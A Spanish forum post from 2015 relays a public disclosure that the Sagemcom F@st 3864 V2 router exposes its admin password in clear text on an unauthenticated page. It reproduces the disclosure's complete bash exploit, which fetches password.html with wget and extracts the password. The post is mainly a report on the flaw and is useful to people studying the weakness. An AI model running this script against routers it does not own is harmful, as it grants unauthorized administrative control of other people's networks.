Obtener credenciales de administrador en un sagemcom "f@st 3864"(v2) (Pagina 1) / Seguridad y Hacking / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 20-08-2015 15:43:48

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,056

Obtener credenciales de administrador en un sagemcom "[email protected] 3864"(v2)

Sagemcom [email protected] 3864 V2 ...
Un nombre que no miente : Obtener los credenciales de administrador es ... muy "fast"

sagemcom1.jpg

  Antes de todo felicitar a Cade Bull quien ha publicado acerca de esta brecha hace tres días atrás en packet storm.

  Sagemcom es un fabricante francés de material wifi que nunca ha destacado por hacer material "de primera"
Esta mas bien especializado en la producción en masa de "box", mas destinadas a seducir las tele-operadoras que los consumidores.
Es un fabricante mundialmente implantado : Por ejemplo ha producido la primera versión de la livebox española.

  A nivel de seguridad alternan entre bueno y malo.
Si las primeras livebox fueron a este nivel bastante acertadas, seguras, no ha sido ( no es ) el caso de todos sus modelos.

  El [email protected] 3864 es otra de estas "box"; mas moderna que la vieja livebox.
Sin antenas exteriores, con WPS.. algo muy habitual en las "box", una "box" entre tantas.

sagem2.jpg

  Podemos ver en la captura de pantalla que nuestro [email protected] 3864 esta empleado por el ISP australiano OPTUS "yes"
Que tiene toda la pinta de ser.... 
...Una pura mierda de ISP;  ya que su sitio ni siquiera esta en https...
Y quieren que sus clientes paguen  facturas pasando por su web... pam 
   Retards !!! mad

No es sorprendente viendo esto que su box tenga una backdoor explotable por un muchacho.
 

Puerta trasera permitiendo una escala de privilegios por obtención de los credenciales de administrador

Aquí tenemos al exploit bajo forma de un sencillo script bash :

#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom [email protected] 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################
 
# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
  
if [ "$1" != "" ]
then
    IP_ADDRESS="$1"
else
    echo "Usage : $0 IP_ADDRESS"
    exit 1
fi
  
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O -  | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"

Se trata simplemente de ir en la interfaz de configuración del router en la pagina ... "password.html"
Esto es posible porque , primero y obviamente hicieron las cosas como el culo, segundo, porque en las Box de sagemcom se puede aceder a la interfaz sin entrar credenciales.
Es solo cuando vamos a querer modificar cosas sensibles que se nos pedirá credenciales.
No tengo una fast de estas pero he podido probar otros modelos ej: sagem4.jpg
Muy similares de aspecto, muy similares en todos puntos y asi va la cosa.
 
  Una vez conectados a la red local, sin credenciales, podéis navegar libremente en la interfaz y acceder a información bastante clave que a lo mejor el propietario del enrutador no quiere compartir con sus invitados
O información que a lo mejor no le gustaría tener "regalada" en caso de intrusión:

sagem3.jpg

Otro ejemplo de cosas que se pueden hacer sin credenciales : es habilitar el acceso a un PC en la red local pam
Esto si que es potencialmente chungo y no se debería poder hacer sin entrar credenciales de administrador :

sagem5.jpg

Esto es la interfaz de un moedlo un poco mejor que el de los australiano, no se como es la interfaz de los australianos, en todos casos el autor del full dislosure explica que el funcionamiento es en esencia el mismo con la posibilidad de pasearse como en casa en la interfaz del router y sin privilegios de administrador.

The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms

 
  Y ademas se guarda el password en.... texto plano pam

the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials

  Solo tenemos que recogerlo.

Felicidades y gracias a Cade Bull por compartir con [email protected] esta noticia smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Belgrano Windalo por Patcher
2 34 Hoy 05:39:22 por Fisgon
9 80 Hoy 00:45:10 por dynyly
11 176 Hoy 00:44:17 por Patcher
Hola! por Ike
3 33 Ayer 22:36:24 por Flashed
0 14 Ayer 19:25:20 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Ike
Usuarios registrados conectados: 0
Invitados conectados: 5

Estadisticas de los foros

Número total de usuarios registrados: 356
Número total de temas: 618
Número total de mensajes: 4,234

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20